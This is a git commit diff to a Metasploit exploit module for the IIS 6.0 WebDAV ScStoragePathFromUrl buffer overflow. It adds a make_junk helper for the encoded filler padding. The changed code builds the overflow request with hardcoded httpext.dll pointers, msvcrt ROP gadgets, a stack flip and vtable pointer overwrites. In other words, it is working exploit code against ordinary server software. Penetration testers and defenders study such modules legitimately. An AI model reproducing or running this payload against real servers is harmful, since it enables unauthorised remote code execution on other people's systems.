Added make_junk function

2017-05-18 19:06:09 -07:00 · 2017-05-18 19:06:09 -07:00 · 7ca0fe5a68
parent 2f39daafc5
commit 7ca0fe5a68
1 changed files with 11 additions and 6 deletions
--- a/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
+++ b/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
@ -157,6 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
    return str.force_encoding('UTF-16LE').encode('UTF-8')
  end

+  #filler chars to be encoded
+  def make_junk(len)
+    return utf_encode_str(rand_text_alpha(len))
+  end
+
  def exploit
    # extract the local servername and port from a PROPFIND request
    # these need to be the values from the backend server
@ -189,28 +194,28 @@ class MetasploitModule < Msf::Exploit::Remote
      begin
        buf1 = "<#{http_host}/"
        buf1 << rand_text_alpha(114 - path_len)
-        buf1 << utf_encode_str(junk * 16)
+        buf1 << make_junk(32)
        #survive SHR instruction 0x02020202
        buf1 << utf_encode_str([0x02020202].pack('V'))
        #str pointer to .data httpext.dll # ebp-328 # used in wcslen calculation
        buf1 << utf_encode_str([0x680312c0].pack('V'))
-        buf1 << utf_encode_str(junk * 20)
+        buf1 << make_junk(40)
        #0x680313c0 -> destination pointer used with memcpy
        buf1 << utf_encode_str([0x680313c0].pack('V'))
        buf1 << ">"
        buf1 << " (Not <locktoken:write1>) <#{http_host}/"
        buf1 << rand_text_alpha(114 - path_len)
-        buf1 << utf_encode_str(junk * 14)
+        buf1 << make_junk(28)
        #0x680313c0  -> pointer to call itself at same address for vtable call
        buf1 << utf_encode_str([0x680313c0].pack('V'))
        #ROP 2 gadget -> advance ESP past previous instructions to start of ROP chain
        #msvct.dll 0x77bdf38d # ADD ESP,1C # POP ECX # POP EBX # POP EAX # RETN
        buf1 << utf_encode_str([0x77bdf38d].pack('V'))
-        buf1 << utf_encode_str(junk * 4)
-        #0x680313c0 -> vtable pointer passed to EAX for [call eax +24]
+        buf1 << make_junk(8)
+        #0x680313c0 -> vtable pointer passed to EAX for call [eax +24]
        #point to itself at [eax]
        buf1 << utf_encode_str([0x680313c0].pack('V'))
-        buf1 << utf_encode_str(junk * 8)
+        buf1 << make_junk(16)
        #ROP 1 gadget -> 0x68016082 stack flip get ECX into ESP and push EAX
        #which also points to new ESP
        buf1 << utf_encode_str([0x68016082].pack('V'))